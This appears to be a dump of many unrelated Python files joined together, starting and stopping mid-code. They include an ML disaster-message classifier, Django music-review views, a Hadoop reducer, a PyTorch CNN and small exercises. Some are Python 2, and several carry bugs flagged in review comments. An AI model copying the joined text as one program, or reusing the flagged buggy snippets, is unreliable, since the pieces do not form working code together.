    engine = create_engine('sqlite:///{}'.format(database_filepath))
    df = pd.read_sql_table('DisaterResponsefinal', engine)
    X = df['message']
    Y = df.drop(['id', 'message', 'original', 'genre'], axis=1)
    category_names = df.columns[4:]
    return X, Y, category_names
def tokenize(text):
    """
    Input:
        text: the raw message
    Output:
        clean_tokens: lower-cased, lemmatized, stripped tokens
    Cleans text via tokenization and lemmatization.  (The unreachable
    `pass` after `return` was removed.)
    """
    lemmatizer = WordNetLemmatizer()
    # lemmatize, normalize case, and remove leading/trailing white space
    return [lemmatizer.lemmatize(tok).lower().strip()
            for tok in word_tokenize(text)]
# adding StartingVerbExtractor features besides the TF-IDF
class StartingVerbExtractor(BaseEstimator, TransformerMixin):
    """
    Transformer flagging whether any sentence of a message starts with a
    verb (or the 'RT' token).  Used as an extra feature beside TF-IDF.
    """

    def starting_verb(self, text):
        """Return True if some sentence in *text* opens with a verb or 'RT'."""
        sentence_list = nltk.sent_tokenize(text)
        for sentence in sentence_list:
            pos_tags = nltk.pos_tag(tokenize(sentence))
            # Fix: an empty/punctuation-only sentence yields no tags; the old
            # code raised IndexError on pos_tags[0] in that case.
            if not pos_tags:
                continue
            first_word, first_tag = pos_tags[0]
            if first_tag in ['VB', 'VBP'] or first_word == 'RT':
                return True
        return False

    def fit(self, X, y=None):
        """Stateless transformer: nothing to fit (scikit-learn API)."""
        return self

    def transform(self, X):
        """Map each document to a one-column boolean DataFrame."""
        X_tagged = pd.Series(X).apply(self.starting_verb)
        return pd.DataFrame(X_tagged)
def build_model():
    """
    Build the scikit-learn pipeline: TF-IDF features plus the starting-verb
    flag, feeding a multi-output AdaBoost classifier, wrapped in a grid
    search over the booster's size and learning rate.  (The unreachable
    `pass` after `return` was removed.)
    """
    pipeline = Pipeline([
        ('features', FeatureUnion([
            ('text_pipeline', Pipeline([
                ('vect', CountVectorizer(tokenizer=tokenize)),
                ('tfidf', TfidfTransformer())
            ])),
            ('starting_verb', StartingVerbExtractor())
        ])),
        ('clf', MultiOutputClassifier(AdaBoostClassifier()))
    ])
    parameters = {
        'clf__estimator__n_estimators': [20, 50, 70],
        'clf__estimator__learning_rate': [0.1, 0.2, 0.5]}
    cv = GridSearchCV(pipeline, param_grid=parameters)
    return cv
def evaluate_model(model, X_test, Y_test, category_names):
    """
    Inputs:
        model: fitted ML pipeline
        X_test: test features
        Y_test: test labels (one column per category)
        category_names: multioutput label names
    Output:
        results: DataFrame with weighted f1 score, precision and recall per
        category (also printed, with column averages).
    Changes: the manual counter was replaced by enumerate and the
    unreachable `pass` after `return` was removed.
    """
    y_pred = model.predict(X_test)
    rows = []
    for num, cat in enumerate(category_names):
        precision, recall, f_score, support = precision_recall_fscore_support(
            Y_test[cat], y_pred[:, num], average='weighted')
        rows.append([cat, float(f_score), float(precision), float(recall)])
    results = pd.DataFrame(rows, columns=['Category', 'f_score', 'precision', 'recall'])
    print('Average f_score:', results['f_score'].mean())
    print('Average precision:', results['precision'].mean())
    print('Average recall:', results['recall'].mean())
    print(results)
    return results
def save_model(model, model_filepath):
    """
    Inputs:
        model : fitted GridSearchCV or scikit-learn Pipeline object
        model_filepath: destination path for the .pkl file
    Serializes the trained model to a pickle file so it can be reloaded
    later for analysis.  (The pointless trailing `pass` was removed.)
    """
    with open(model_filepath, 'wb') as f:
        pickle.dump(model, f)
def main():
    """CLI entry point: load data, train, evaluate, and pickle the model.

    Usage: python train_classifier.py <database_filepath> <model_filepath>
    """
    if len(sys.argv) != 3:
        # Wrong arity: explain usage and exit without training.
        print('Please provide the filepath of the disaster messages database '
              'as the first argument and the filepath of the pickle file to '
              'save the model to as the second argument. \n\nExample: python '
              'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
        return

    database_filepath, model_filepath = sys.argv[1:]
    print('Loading data...\n    DATABASE: {}'.format(database_filepath))
    X, Y, category_names = load_data(database_filepath)
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)

    print('Building model...')
    model = build_model()

    print('Training model...')
    model.fit(X_train, Y_train)

    print('Evaluating model...')
    evaluate_model(model, X_test, Y_test, category_names)

    print('Saving model...\n    MODEL: {}'.format(model_filepath))
    save_model(model, model_filepath)

    print('Trained model saved!')


if __name__ == '__main__':
    main()
#!/usr/bin/env python
"""Project Euler - project 1 - Hadoop version (reducer)
If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000."""
import sys
def read_mapper_output(file):
    """Yield each line of *file* with surrounding whitespace stripped.

    Fix: iterate the file object lazily instead of calling readlines(),
    so the whole stream is never held in memory at once (it can be
    arbitrarily large when fed from Hadoop streaming).
    """
    for line in file:
        yield line.strip()
def main():
    """Sum the integers streamed from the mapper and print the total."""
    # input comes from STDIN (standard input)
    # expects a set of data to sum
    data = read_mapper_output(sys.stdin)
    total = 0
    for x in data:
        total += int(x)
    # NOTE: Python 2 print statement -- this reducer targets a Python 2 runtime.
    print total
if __name__ == "__main__":
    main()
# Generated by Django 2.2.5 on 2019-12-10 14:07
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds the Student model and updates the
    # verbose label of Comment.author_name.  Django tracks these operations by
    # order and content -- avoid hand-editing applied migrations.

    dependencies = [
        ('article', '0004_auto_20191013_2242'),
    ]
    operations = [
        migrations.CreateModel(
            name='Student',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('student_name', models.TextField(verbose_name='Полное имя студента')),
                ('student_course', models.CharField(max_length=20, verbose_name='Курс студента')),
            ],
        ),
        migrations.AlterField(
            model_name='comment',
            name='author_name',
            field=models.CharField(max_length=200, verbose_name='имя автора'),
        ),
    ]
|
# Testing classes
class AnonymousSurvey():
    """Collect and display anonymous answers to a survey question."""

    def __init__(self, question):
        """Remember the question and start with an empty response list."""
        self.question = question
        self.responses = []

    def show_questions(self):
        """Print the survey question."""
        print(self.question)

    def store_responses(self, new_response):
        """Record a single response."""
        self.responses.append(new_response)

    def show_results(self):
        """Print every response collected so far."""
        print("Survey results:")
        for answer in self.responses:
            print("- " + answer)
# Module-level demo: create a survey and print its question on import.
survey = AnonymousSurvey("Where do you live?")
survey.show_questions()
|
from django.conf import settings
def IS_PRODUCTION(request):
    """Template context processor exposing the IS_PRODUCTION settings flag."""
    return dict(IS_PRODUCTION=settings.IS_PRODUCTION)
from django.db import models
from django.contrib.auth.models import User
class StudySkillsResult(models.Model):
    """
    Stores students' responses to the study skills assessment.
    """
    # on_delete made explicit: it is required from Django 2.0 on, and CASCADE
    # matches the implicit pre-2.0 default, so existing behaviour is unchanged.
    student = models.ForeignKey(User, on_delete=models.CASCADE)
    answers = models.TextField()
    date_taken = models.DateTimeField(auto_now_add=True)
|
from django.shortcuts import render, redirect
from .models import Song, Songs_list, Artist, Album, Reviews, Album_Reviews, Artist_Reviews, Song_Reviews
from django.db import IntegrityError
from django.contrib import messages
from enum import Enum
from datetime import date
from django.core.mail import send_mail
from django.conf import settings
# TODO disalow empty fields and duplicate songs
# User-facing fallback message for unexpected failures.
ERROR_MESSAGE = 'Uh oh, something went wrong... We\'ll get right on it'
# Maps short review-type codes (posted by forms) to display names.
REVIEW_TYPE = {'s': 'Song', 'ar': 'Artist', 'al': 'Album', 'p': 'Playlist'}
def home(request):
    """Render the landing page."""
    template_name = 'home.html'
    return render(request, template_name)
def user(request):
    """Render the current user's 'top 5' songs page.

    NOTE(review): near-duplicate of user_songs() below -- consider delegating.
    """
    # Last five 'top 5' list rows for this user, oldest-first after reversal.
    lists = Songs_list.objects.filter(user=request.user, name='top 5').order_by('-id')[:5][::-1]
    list = []  # NOTE(review): shadows the builtin `list`
    for e in lists:
        print(e.id)
        print(type(e))
        # print(getattr(e.song,'song_id'))
        # NOTE(review): filters Song by the Songs_list row id (e.id) -- looks
        # like it should use the related song's id; confirm against the models.
        list.append(
            SongObj(Song.objects.filter(id=e.id).first().get_name(),
                    Song.objects.filter(id=e.id).first().get_artist().get_name()))
    return render(request, 'usersongs.html', {'list': list})
def review(request):
    """Create a review (song/album/artist; playlist is TODO) from a POSTed form.

    GET renders the empty creation form.  POST creates the base Reviews row,
    then the subtype row (Song_Reviews / Album_Reviews / Artist_Reviews),
    creating any missing Artist / Album / Song rows on the way.

    NOTE(review): review_type from the form is compared against REVIEW_TYPE's
    *values* ('Song', 'Artist', ...), so the form must post display names,
    not the short codes -- confirm against the templates.
    """
    if request.method == 'POST':
        # review_type: artist, album, song, or playlist
        review_type = request.POST['review-type']
        print("review type: {0}\nreview type == \'s\': {1}".format(review_type, review_type == REVIEW_TYPE['s']))
        review_text = request.POST['review-text']
        review_date = date.today()
        date_modified = date.today()
        # review_score: points added or subtracted to review by community
        review_score = 1
        # review_rating: reviewer's rating of subject out of 10
        review_rating = float(request.POST['rating'])
        # review_subj_auth: artist for artist, album, song reviews; user for playlist reviewa
        review_subj_auth = request.POST['subj-auth']
        # review_subj_container: album (only for song reviews)
        review_subj_container = None
        if review_type == REVIEW_TYPE['s']:
            review_subj_container = request.POST['subj-container']
        # review_subj: song or album or playlist (N/A for artist reviews)
        review_subj = request.POST['subj']
        review_title = request.POST['review-title']
        print(review_text)
        review_user = request.user
        # Base review row shared by every review subtype.
        review_base = Reviews.objects.create(
            name=review_title,
            text=review_text,
            date=review_date,
            rating=review_rating,
            score=review_score,
            user=review_user,
            date_modified=date_modified
        )
        review_obj = None
        if review_type != REVIEW_TYPE['p']:
            # Resolve the artist: for song/album reviews it comes from
            # 'subj-auth'; for artist reviews the subject IS the artist.
            if review_type != REVIEW_TYPE['ar']:
                # check if artist already exists in db
                if Artist.objects.filter(name=review_subj_auth).count() > 0:
                    artist = Artist.objects.filter(name=review_subj_auth).first()
                # if not, add it
                else:
                    artist = Artist.objects.create(
                        name=review_subj_auth
                    )
            else:
                # check if artist already exists in db
                if Artist.objects.filter(name=review_subj).count() > 0:
                    artist = Artist.objects.filter(name=review_subj).first()
                # if not, add it
                else:
                    artist = Artist.objects.create(
                        name=review_subj
                    )
            if review_type == REVIEW_TYPE['al']:
                review_base.review_type = 'al'
                review_base.save()
                # check if album already exists in db
                if Album.objects.filter(name=review_subj, artist=artist).count() > 0:
                    album = Album.objects.filter(name=review_subj, artist=artist).first()
                # if not, add it
                else:
                    album = Album.objects.create(
                        name=review_subj,
                        artist=artist
                    )
                review_obj = Album_Reviews.objects.create(
                    review=review_base,
                    album=album,
                )
            elif review_type == REVIEW_TYPE['s']:
                review_base.review_type = 'so'
                review_base.save()
                # check if album already exists in db
                if Album.objects.filter(name=review_subj_container, artist=artist).count() > 0:
                    album = Album.objects.filter(name=review_subj_container, artist=artist).first()
                # if not, add it
                else:
                    album = Album.objects.create(
                        name=review_subj_container,
                        artist=artist
                    )
                # check if song already exists in db
                if Song.objects.filter(name=review_subj, album=album, artist=artist).count() > 0:
                    song = Song.objects.filter(name=review_subj, album=album, artist=artist).first()
                # if not, add it
                else:
                    song = Song.objects.create(
                        name=review_subj,
                        artist=artist,
                        album=album
                    )
                review_obj = Song_Reviews.objects.create(
                    review=review_base,
                    song=song,
                )
            else:
                review_base.review_type = 'ar'
                review_base.save()
                review_obj = Artist_Reviews.objects.create(
                    review=review_base,
                    artist=artist
                )
        else:
            # TODO implement playlist reviews
            # NOTE(review): review_obj stays None here, so the save() below
            # would raise AttributeError for playlist reviews.
            pass
        review_obj.save()
        return redirect('myreviews')
    else:
        return render(request, 'createreview.html')
def edit_review(request):
    """Edit an existing review.

    GET with 'revid' renders the edit form pre-filled from the review and
    its subtype row; POST saves title/text/rating and bumps date_modified.
    Anything else redirects back to the creation view.
    """
    if request.method == 'GET' and 'revid' in request.GET:
        review_id = request.GET['revid']
        review = Reviews.objects.filter(id=review_id).first()
        subj = review.name
        title = review.name
        text = review.text
        subj_auth = ''
        subj_cont = ''
        username = request.user.username
        date_p = review.date
        date_modified = review.date_modified
        rating = review.rating
        score = review.score
        subject = subj
        review_type = review.review_type
        # Pull subject/author/container details from the subtype row; note
        # `review` is rebound to the subtype object inside each branch.
        if review_type == 'al':
            review = Album_Reviews.objects.filter(review_id=review.id).first()
            subj = review.album.name
            subj_auth = review.album.artist.name
            subj_cont = ''
            subject = '{0} by {1}'.format(subj, subj_auth)
        elif review_type == 'so':
            review = Song_Reviews.objects.filter(review_id=review.id).first()
            subj = review.song.name
            subj_auth = review.song.artist.name
            subj_cont = review.song.album.name
            subject = '{0} by {1} from the album {2}'.format(subj, subj_auth, subj_cont)
        elif review_type == 'ar':
            review = Artist_Reviews.objects.filter(review_id=review.id).first()
            subj = review.artist.name
            subj_cont = ''
            subj_auth = ''
            subject = subj
            # NOTE(review): the next line builds a string and discards it.
            '{0} by {1}'.format(subj, subj_auth)
        elif review_type == 'pl':
            pass
        else:
            pass
        printable = PrintableReview(
            review_id=review_id,
            subject=subject,
            subj=subj,
            subj_auth=subj_auth,
            title=title,
            text=text,
            date=date_p,
            username=username,
            score=score,
            rating=rating,
            date_modified=date_modified,
            subj_cont=subj_cont
        )
        return render(request, 'editreview.html', {'rev': printable})
    if request.method == 'POST':
        review_id = request.POST['revid']
        title = request.POST['review-title']
        text = request.POST['review-text']
        rating = request.POST['rating']
        review = Reviews.objects.filter(id=review_id).first()
        review.name = title
        review.text = text
        review.date_modified = date.today()
        review.rating = rating
        review.save()
        return redirect('myreviews')
    return redirect('review')
def generate_review_list(request, display_type, order_by):
    """Build a list of PrintableReview view-models.

    display_type 'user' limits to the current user's reviews; anything else
    returns all reviews.  Results are ordered by *order_by* descending
    (order_by ascending, then reversed).

    Fix: the 'so' branch previously read `.name` directly off a QuerySet
    (`Album.objects.filter(...).name`), which raises AttributeError; the
    related objects already fetched via the song are used instead.
    """
    if display_type == 'user':
        reviews = Reviews.objects.filter(user=request.user).order_by(order_by)[::-1]
    else:
        reviews = Reviews.objects.all().order_by(order_by)[::-1]
    review_list = []
    for r in reviews:
        review_id = r.id
        r_type = r.review_type
        if r is None:
            pass
        elif r_type == 'so':
            review_temp = Song_Reviews.objects.filter(review=r).first()
            song = Song.objects.filter(id=review_temp.song_id).first()
            subj = '{0} by {1} from the album {2}'.format(
                song.name,
                Artist.objects.filter(id=song.artist_id).first().name,
                Album.objects.filter(id=song.album_id).first().name,
            )
            review_list.append(
                PrintableReview(
                    review_id=review_id,
                    subject=subj,
                    title=r.name,
                    rating=r.rating,
                    score=r.score,
                    date=r.date,
                    text=r.text,
                    subj=song.get_name(),
                    # Fixed: was Album/Artist.objects.filter(...).name, i.e.
                    # attribute access on a QuerySet (AttributeError).
                    subj_cont=song.get_album().name,
                    subj_auth=song.get_artist().name,
                    username=request.user.username,
                    date_modified=date.today()
                )
            )
        elif r_type == 'al':
            review_temp = Album_Reviews.objects.filter(review=r).first()
            album = review_temp.get_album().get_name()
            subj = '{0} by {1}'.format(
                album,
                review_temp.get_album().get_artist().get_name(),
            )
            review_list.append(
                PrintableReview(
                    review_id=review_id,
                    subject=subj,
                    title=r.get_name(),
                    rating=r.get_rating(),
                    score=r.get_score(),
                    date=r.get_date(),
                    text=r.get_text(),
                    subj=album,
                    subj_auth=review_temp.get_album().get_artist().get_name(),
                    subj_cont='',
                    username=request.user.username,
                    date_modified=date.today()
                )
            )
        elif r_type == 'ar':
            review_temp = Artist_Reviews.objects.filter(review=r).first()
            artist = review_temp.artist.name
            subj = artist
            review_list.append(
                PrintableReview(
                    review_id=review_id,
                    subj=subj,
                    subj_cont='',
                    subj_auth='',
                    subject=subj,
                    title=r.name,
                    rating=r.rating,
                    score=r.score,
                    date=r.date,
                    text=r.text,
                    username=request.user.username,
                    date_modified=date.today()
                )
            )
        else:
            # TODO playlist reviews
            pass
    return review_list
def user_reviews(request):
    """Render the logged-in user's reviews, most recent first."""
    reviews = generate_review_list(request, 'user', 'date')
    return render(request, 'userreviews.html', {'list': reviews})
def user_songs(request):
    """Render the current user's 'top 5' songs page (same as user() above)."""
    # Last five 'top 5' list rows for this user, oldest-first after reversal.
    lists = Songs_list.objects.filter(user=request.user, name='top 5').order_by('-id')[:5][::-1]
    list = []  # NOTE(review): shadows the builtin `list`
    for e in lists:
        # print(e.id)
        # print(type(e))
        # print(getattr(e.song,'song_id'))
        # NOTE(review): filters Song by the Songs_list row id (e.id) -- looks
        # like it should use the related song's id; confirm against the models.
        list.append(
            SongObj(Song.objects.filter(id=e.id).first().get_name(),
                    Song.objects.filter(id=e.id).first().get_artist().get_name()))
    return render(request, 'usersongs.html', {'list': list})
def friends(request):
    """Render the user's friends page (friend data not implemented yet)."""
    context = {'list': ''}
    return render(request, 'userfriends.html', context)
def topsongs(request):
    """Create/refresh the user's 'top 5' song list from the submitted form.

    TODO: generalize for arbitrary list names, fetch real album data from
    Spotify, and stop storing duplicate songs / one Songs_list row per song.

    Fix: for a brand-new artist the old code created the placeholder album
    unconditionally AND again behind a dead `count() == 0` check, inserting
    duplicate Album rows; album lookup is now a single get-or-create step.
    """
    if request.method != 'POST':
        return render(request, 'topsongs.html')

    print(True)
    error = ''
    artists = [request.POST['artist%d' % i] for i in range(1, 6)]
    songnames = [request.POST['song%d' % i] for i in range(1, 6)]
    # TODO get this from spotify
    cur_alb = 'TBD'
    # TODO generalize this
    list = 'top 5'
    # Add each (artist, song) pair, creating missing rows as needed.
    for i in range(len(artists)):
        if not artists[i] or not songnames[i]:
            error = ERROR_MESSAGE
            # TODO add input error responses
            continue
        cur_art = artists[i]
        cur_song = songnames[i]
        # Get or create the artist.
        artist = Artist.objects.filter(name=cur_art).first()
        if artist is None:
            artist = Artist.objects.create(name=cur_art)
        # Get or create the placeholder album for this artist.
        album = Album.objects.filter(name=cur_alb, artist=artist).first()
        if album is None:
            album = Album.objects.create(name=cur_alb, artist=artist)
        # Get or create the song, then attach it to a fresh list row.
        song = Song.objects.filter(name=cur_song, album=album, artist=artist).first()
        if song is None:
            song = Song.objects.create(name=cur_song, album=album, artist=artist)
        else:
            print(song)
        songs = Songs_list.objects.create(user=request.user, name=list)
        songs.song.add(song)
        # TODO don't add duplicates, and replace if they are on the same list
    return redirect('user')
def trending(request):
    """Render every review, ordered by community score."""
    reviews = generate_review_list(request, 'all', 'score')
    return render(request, 'trending.html', {'list': reviews})
def upvote(request):
    """Increment a review's community score by one, then show trending."""
    print(request.method)
    if request.method == 'POST':
        target = Reviews.objects.filter(id=request.POST['revid']).first()
        target.score += 1
        target.save()
    # GET (or anything else) falls through to the same redirect.
    return redirect('trending')
def downvote(request):
    """Decrement a review's community score by one, then show trending."""
    print(request.method)
    if request.method == 'POST':
        target = Reviews.objects.filter(id=request.POST['revid']).first()
        target.score -= 1
        target.save()
    # GET (or anything else) falls through to the same redirect.
    return redirect('trending')
def help(request):  # NOTE(review): shadows the builtin help(); rename carefully (URL conf may reference it)
    """Render the help page."""
    # send_email(['schleendevs@gmail.com'], 'help!', 'someone visited the help page')
    return render(request, 'help.html')
def handle_errors(ex):
    """Placeholder error handler.

    TODO: handle errors, possibly send an email to the dev team.
    """
    return None
class SongObj:
    """Lightweight view-model pairing a song title with its artist name.

    Fixed: the former class-level assignments (``title = str``) stored the
    *type objects* as shared defaults; they are now plain annotations.
    """
    title: str
    artist: str

    def __init__(self, title, artist):
        self.title = title
        self.artist = artist
class PrintableReview:
    """Flat view-model carrying everything a review template needs.

    Fixed: the former class-level assignments (``title = str`` etc.) stored
    the *type objects* as shared defaults; they are now plain annotations.
    """
    review_id: int
    subject: str       # full display line, e.g. "Song by Artist from ..."
    title: str
    rating: float
    score: int
    date: str
    text: str
    username: str
    subj: str          # bare subject name
    subj_auth: str     # artist (empty for artist reviews)
    subj_cont: str     # containing album (song reviews only)
    date_modified: str

    def __init__(self, review_id, subject, title, rating, score, date, text, username, subj, subj_auth, subj_cont,
                 date_modified):
        self.review_id = review_id
        self.subject = subject
        self.title = title
        self.rating = rating
        self.score = score
        self.date = date
        self.text = text
        self.username = username
        self.subj = subj
        self.subj_auth = subj_auth
        self.subj_cont = subj_cont
        self.date_modified = date_modified
def send_email(recip, subject, body):
    """Send *body* to the list of recipients from the configured host user.

    fail_silently=False: SMTP errors propagate to the caller.
    """
    send_mail(
        subject,
        body,
        settings.EMAIL_HOST_USER,
        recip,
        fail_silently=False
    )
|
#!/usr/bin/env python
# coding: utf-8
class lazyproperty:
    """Non-data descriptor that computes a value once per instance.

    On first access the wrapped function runs and its result is stored on
    the instance under the function's own name; because instance attributes
    shadow non-data descriptors, later accesses never reach __get__ again.
    """

    def __init__(self, func):
        self.func = func

    def __get__(self, instance, cls):
        # Class-level access returns the descriptor itself.
        if instance is None:
            return self
        result = self.func(instance)
        setattr(instance, self.func.__name__, result)
        return result
import math
class Circle:
    """Circle whose derived measurements are computed lazily, once each."""
    def __init__(self, radius):
        self.radius = radius
    @lazyproperty
    def area(self):
        # Printed exactly once per instance: later accesses hit the cache.
        print('Computing area')
        return math.pi * self.radius ** 2
    @lazyproperty
    def perimeter(self):
        # Printed exactly once per instance: later accesses hit the cache.
        print('Computing perimeter')
        return 2 * math.pi * self.radius
# Demo of the descriptor-based lazyproperty: the first access computes and
# caches; repeats read the plain instance attribute.
c = Circle(4.0)
c.radius
print(c.area)
c.area
c.perimeter
c.perimeter
# Fresh instance: the cache is visible in vars() and can be reset with del.
c = Circle(4.0)
vars(c)
c.area
c.area
del c.area
vars(c)
c.area
c.area
# The cached value is an ordinary attribute, so it can even be overwritten.
c.area = 25
c.area
def lazyproperty(func):
    """Property variant of the lazy attribute: cache under '_lazy_<name>'.

    Unlike the descriptor version, this returns a (data-descriptor)
    property, so the attribute is read-only and every access goes through
    the property -- only the underlying computation is skipped.
    """
    cache_name = '_lazy_' + func.__name__

    @property
    def lazy(self):
        try:
            return getattr(self, cache_name)
        except AttributeError:
            result = func(self)
            setattr(self, cache_name, result)
            return result

    return lazy
# NOTE(review): redefining lazyproperty above does NOT rebind Circle's
# already-created descriptors, so these accesses still use the class-based
# version (compute once, then cached attribute).
c = Circle(4.0)
c.area
c.area
c.area
|
from math import *
# Python 2 script (raw_input / xrange / print statement).
# n runners at positions pos[] with speeds sp[]; mx/mn bound the search range.
n = int(raw_input())
pos = list(map(float, raw_input().split()))
sp = list(map(float, raw_input().split()))
mx = max(pos)
mn = min(pos)
def f(p):
    # Worst (largest) travel time |pos[x] - p| / sp[x] over all runners
    # to reach meeting point p.  Reads module-level n, pos, sp.
    ans = 0.0
    for x in xrange(n):
        ans = max(ans, abs(pos[x] - p)/sp[x])
    return ans
def bin():
    # NOTE(review): shadows the builtin bin().  300 bisection steps over
    # [mn, mx] searching the point minimising the worst arrival time f().
    hi = mx
    lo = mn
    best = 10000000000.0
    for x in xrange(300):
        mid =(hi + lo)/2.0
        # NOTE(review): compares f at the ENDPOINTS, not around mid --
        # confirm intended; classic ternary search probes near the middle.
        k = f(lo)
        q = f(hi)
        if(k < q):
            hi = mid
            best = min(best, k)
        else:
            lo = mid
            best = min(best, q)
    return best
print '%.8f' % bin()
|
# to find files in the html string
import re
import requests
url = 'https://www.sina.com.cn'
url = 'https://www.hlgnet.com'  # earlier value is discarded; only this URL is fetched
text = requests.get(url).text
# print(text)
re_str = r'src = "(.*?\.jpg)"'
re_str = r'https:.+\.jpg'
# NOTE(review): r'[jpg|gif]' is a character CLASS matching the single
# characters j, p, g, i, f and '|' -- not the alternation (jpg|gif).
# Only this final pattern is actually used; the two above are dead.
re_str = r'[jpg|gif]'
file_name_list = re.findall(re_str, text)
print(file_name_list)
|
class Spam:
    """Tracks how many Spam instances have ever been constructed."""

    num_instances = 0  # shared, class-level counter

    def __init__(self):
        # Bumps the attribute on Spam itself (not type(self)), so any
        # subclasses would share this one counter.
        Spam.num_instances += 1

    def print_num_instances(self):
        """Report the running instance count."""
        print('Number of instances created: %s' % Spam.num_instances)
# Build three instances, then call the method through the class with an
# explicit instance argument (equivalent to a.print_num_instances()).
a = Spam()
b = Spam()
c = Spam()
Spam.print_num_instances(a)
|
# Break an amount of cents into Canadian denominations, largest first.
# Each divmod yields (count printed, remainder carried to the next coin).
Total = int(input('Please enter the amount of cents:'))
count, Toonies = divmod(Total, 200)
print(count, "toonies")
count, Loonies = divmod(Toonies, 100)
print(count, "loonies")
count, Quarters = divmod(Loonies, 25)
print(count, "quarters")
count, Dimes = divmod(Quarters, 10)
print(count, "dimes")
count, Nickles = divmod(Dimes, 5)
print(count, "nickles")
print(Nickles // 1, "pennies")
|
from datetime import datetime
import json
class MyLogging:
    """JSON 'logger': each write rewrites the file with the full accumulated
    list of entries (previous entries are merged in from self.boof)."""

    # Timestamp is taken once, at class-definition time, so every instance
    # created in this process shares the same file name.
    t = datetime.now()

    def __init__(self, path):
        self.path = str(path)
        self.f = open(self.path + '/' + self.t.strftime('%d_%m_%y_%H_%M_%S') + '.txt', 'w+')
        self.boof = ''

    def write_data(self, data):
        """Merge *data* (a JSON list string) with the buffer and rewrite."""
        if self.f.closed:
            # Reopening with 'w+' truncates, so the full merged list is
            # written from scratch each time.
            self.f = open(self.f.name, 'w+')
        if self.boof:
            data = json.dumps(json.loads(self.boof) + json.loads(data))
        self.f.write(data)
        self.boof = data
        self.close()

    def close(self):
        """Flush and close the underlying file."""
        self.f.close()
import os
# Demo: two writes accumulate into a single JSON list in the dated file.
m = MyLogging('.')
m.write_data(json.dumps([{'1': '2'}]))
m.write_data(json.dumps([{'3': '5'}]))
|
import os
from Strava.StravaData import StravaData
# Audrey - 18301580
# Ethan - 22985222
# Amy - 23312763
# Athlete ids to process (see the name/id mapping in the comments above).
athletes = [23312763, 18301580, 22985222]
for athlete in athletes:
    strava = StravaData(athlete_id=athlete)
    print("###################################################")
    print(f"Athlete {athlete}")
    print()
    strava.unzip_gz_files()
    # Example activity-id -> export-file mappings:
    # 1122298786 = 1122298786.gpx
    # strava.get_activity_data(1122298786)
    # 1496404022 = 1611726874.tcx
    # strava.get_activity_data(1496404022)
    # 3673509552 = 3922240387.fit
    # strava.get_activity_data(3673509552)
    """
    for id in strava.activities.index:
        strava.get_activity_data(id)
    """
    # Only convert activities whose CSV has not been produced yet.
    for id in strava.activities.index:
        file = os.path.join(strava.activity_folder, f"{id}.csv")
        if not os.path.exists(file):
            strava.get_activity_data(id)
    print()
    print()
|
def Substring(str1, str2, n, m):
    """Longest common substring of str1 (length n) and str2 (length m).

    Prints one longest common substring and returns its length.

    Fix: the old reconstruction rescanned the whole dp table for decreasing
    values of maxN, which could stitch together characters from unrelated,
    non-adjacent cells.  We now remember where the maximum run ends in str1
    and slice the substring out directly.
    """
    dp = [[0] * (m + 1) for _ in range(n + 1)]
    maxN = 0
    end_in_str1 = 0  # index one past the last char of the best match in str1
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            if str1[i - 1] == str2[j - 1]:
                dp[i][j] = 1 + dp[i - 1][j - 1]
                if maxN < dp[i][j]:
                    maxN = dp[i][j]
                    end_in_str1 = i
    x = str1[end_in_str1 - maxN:end_in_str1]
    print("The Common Substring: ", x)
    return maxN
if __name__ == "__main__":
    # Small driver: run Substring on a sample pair and report the length.
    print("\n")
    # str1 = 'ABCDGH'
    # str2 = 'ACDGHR'
    str1 = 'ABC'
    str2 = 'AC'
    n = len(str1)
    m = len(str2)
    ans = Substring(str1, str2, n, m)
    print("Length of Common Substring: ", ans)
    print("\n")
import unittest
import sys
import os
from pymongo import MongoClient
from bson.objectid import ObjectId
from linguine.transaction import Transaction
class TransactionTest(unittest.TestCase):
    """Integration tests for linguine.Transaction against a local MongoDB."""

    def setUp(self):
        self.trans = Transaction('test')
        self.test_data = {}
    def test_parse_json(self):
        #set up test data
        db = 'linguine-test'
        corpora = MongoClient()[db].corpus
        # NOTE(review): insert()/remove() are legacy pymongo (pre-3.0) APIs;
        # modern drivers use insert_one()/delete_one().
        test_contents_id = corpora.insert({ "title": "A Tale of Two Cities", "contents" : "it was the best of times it was the worst of times it was the age of whatever it was the age of whatever", "tags": [] })
        self.test_data = '{"transaction_id":"1", "operation":"NoOp", "library":"no_library", "corpora_ids":["' + str(test_contents_id) + '"]}'
        #clean up
        corpora.remove(test_contents_id)
    def test_run(self):
        #set up test data
        db = 'linguine-test'
        corpora = MongoClient()[db].corpus
        test_contents_id = corpora.insert({"title": "A Tale of Two Cities", "contents" : "it was the best of times it was the worst of times it was the age of whatever it was the age of whatever", "tags": [] })
        self.test_data = '{"transaction_id":"1", "operation":"NoOp", "library":"no_library", "corpora_ids":["' + str(test_contents_id) + '"]}'
        #execute code
        # NOTE(review): nothing is actually executed or asserted here yet.
        #clean up
        corpora.remove(test_contents_id)
if __name__ == '__main__':
    unittest.main()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 10 16:29:06 2019
@author: aalipour
"""
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 27 20:00:30 2019
@author: aalipour
"""
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 14 21:42:02 2019
@author: aalipour
"""
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import os
import numpy as np
import matplotlib.pyplot as plt
import torch.optim as optim
import time
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision.datasets as dset
class Flatten(torch.nn.Module):
    """Collapse every dimension after the batch axis into one."""

    def forward(self, x):
        # (B, ...) -> (B, prod(...))
        return x.view(x.shape[0], -1)
class Network(nn.Module):
    """Small LeNet-style CNN for 1x28x28 inputs, built as one Sequential.

    The stack lives in self.frame and callers run ``net.frame(x)`` directly
    (no forward() override is defined on the module itself).
    """

    def __init__(self):
        super(Network, self).__init__()
        layers = [
            nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5),
            nn.ReLU(),
            nn.MaxPool2d(2, 2),
            # NOTE: no activation after this conv, matching the weights the
            # pretrained checkpoint was saved with.
